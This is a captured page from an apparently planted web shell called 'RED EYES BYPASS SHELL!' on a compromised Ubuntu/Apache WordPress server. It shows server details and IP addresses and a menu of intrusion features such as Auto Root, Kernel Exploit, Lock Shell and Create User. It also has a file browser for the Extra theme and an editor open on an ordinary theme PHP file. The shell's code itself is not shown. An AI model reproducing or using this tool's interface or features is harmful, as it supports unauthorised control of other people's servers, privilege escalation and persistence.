Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
themes /
Extra /
includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
admin
[ DIR ]
drwxr-xr-x
builder
[ DIR ]
drwxr-xr-x
ext
[ DIR ]
drwxr-xr-x
functions
[ DIR ]
drwxr-xr-x
module-customizer
[ DIR ]
drwxr-xr-x
activation.php
947
B
-rwxr-xr-x
block-editor-integration.php
2.79
KB
-rwxr-xr-x
builder-integrations.php
41.78
KB
-rwxr-xr-x
choices.php
5.12
KB
-rwxr-xr-x
core.php
56.92
KB
-rwxr-xr-x
customizer.php
125.09
KB
-rwxr-xr-x
dynamic-assets.php
1.26
KB
-rwxr-xr-x
et-social-followers.php
23.03
KB
-rwxr-xr-x
et-social-share.php
3.67
KB
-rwxr-xr-x
installation.php
248
B
-rwxr-xr-x
layouts.php
11.51
KB
-rwxr-xr-x
modules-defaults.php
13.27
KB
-rwxr-xr-x
modules.php
107.89
KB
-rwxr-xr-x
navigation.php
408
B
-rwxr-xr-x
plugins-eventon-support.php
794
B
-rwxr-xr-x
plugins-lifterlms-support.php
590
B
-rwxr-xr-x
plugins-seo-support.php
5.72
KB
-rwxr-xr-x
plugins-woocommerce-support.php
13.02
KB
-rwxr-xr-x
projects.php
5.69
KB
-rwxr-xr-x
ratings.php
5.62
KB
-rwxr-xr-x
sanitization.php
6.27
KB
-rwxr-xr-x
template-tags.php
53.39
KB
-rwxr-xr-x
theme-builder.php
2.41
KB
-rwxr-xr-x
widgets.php
51.67
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block-editor-integration.php
<?php if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly } /** * Enqueue styles for block editor * * @since ?? */ function et_extra_block_editor_styles() { wp_enqueue_style( 'extra-block-editor-style', get_theme_file_uri( 'includes/admin/styles/editor-blocks.css' ), array(), et_get_theme_version() ); } add_action( 'enqueue_block_editor_assets', 'et_extra_block_editor_styles' ); /** * Setup page layout content width options for block editor * * @since ?? * * @param array $content_widths * * @return array */ function et_extra_gb_content_widths( $content_widths = array() ) { // Customizer value $content_width = absint( et_get_option( 'content_width', 1280 ) ); $sidebar_width = absint( et_get_option( 'sidebar_width', 25 ) ); // Content width when no sidebar exist $no_sidebar = $content_width; // Content width when sidebar exist (default). Extra actually uses percentage based fluid // layout. Default content area is basically 75% of max-width 1280px, with 60px * 2 horizontal // padding and 12px column gutter $padding = 60 * 2; $gutter = 12; $has_sidebar = $content_width - ( ( $content_width / 100 ) * $sidebar_width ) - $padding - $gutter; // Min content width (small smartphone width) $min = 320; // Max content width (15" laptop * 2) $max = 2880; // Current content width $saved = get_post_meta( get_the_ID(), '_et_gb_content_width', true); $current = $saved ? $saved : $has_sidebar; return array( 'current' => $current, 'default' => $has_sidebar, 'min' => $min, 'max' => $max, 'none' => $no_sidebar, 'left' => $has_sidebar, 'right' => $has_sidebar, ); } add_filter( 'et_gb_content_widths', 'et_extra_gb_content_widths' ); /** * Setup selectors for Extra * * @since ?? * * @param array $selectors * * @return array */ function et_extra_gb_selectors( $selectors ) { $selectors['pageLayoutSelect'] = '.extra-admin-input[name="_extra_sidebar_location"]'; return $selectors; } add_filter( 'et_gb_selectors', 'et_extra_gb_selectors' ); /** * Filter Search block widget content. * * @since ?? * * @param string $block_content The block content about to be appended. * @param array $parsed_block The full block, including name and attributes. * * @return string Filtered block content. */ function et_extra_gb_search_wdiget( $block_content, $parsed_block ) { if ( is_array( $parsed_block ) ) { // Set default placeholder text when it's empty. $placeholder = et_()->array_get( $parsed_block, array( 'attrs', 'placeholder' ) ); if ( empty( $placeholder ) ) { $block_content = str_replace( 'placeholder=""', 'placeholder="' . esc_attr_x( 'Search …', 'placeholder' ) . '"', $block_content ); } } return $block_content; } add_filter( 'render_block_core/search', 'et_extra_gb_search_wdiget', 10, 2 );
Close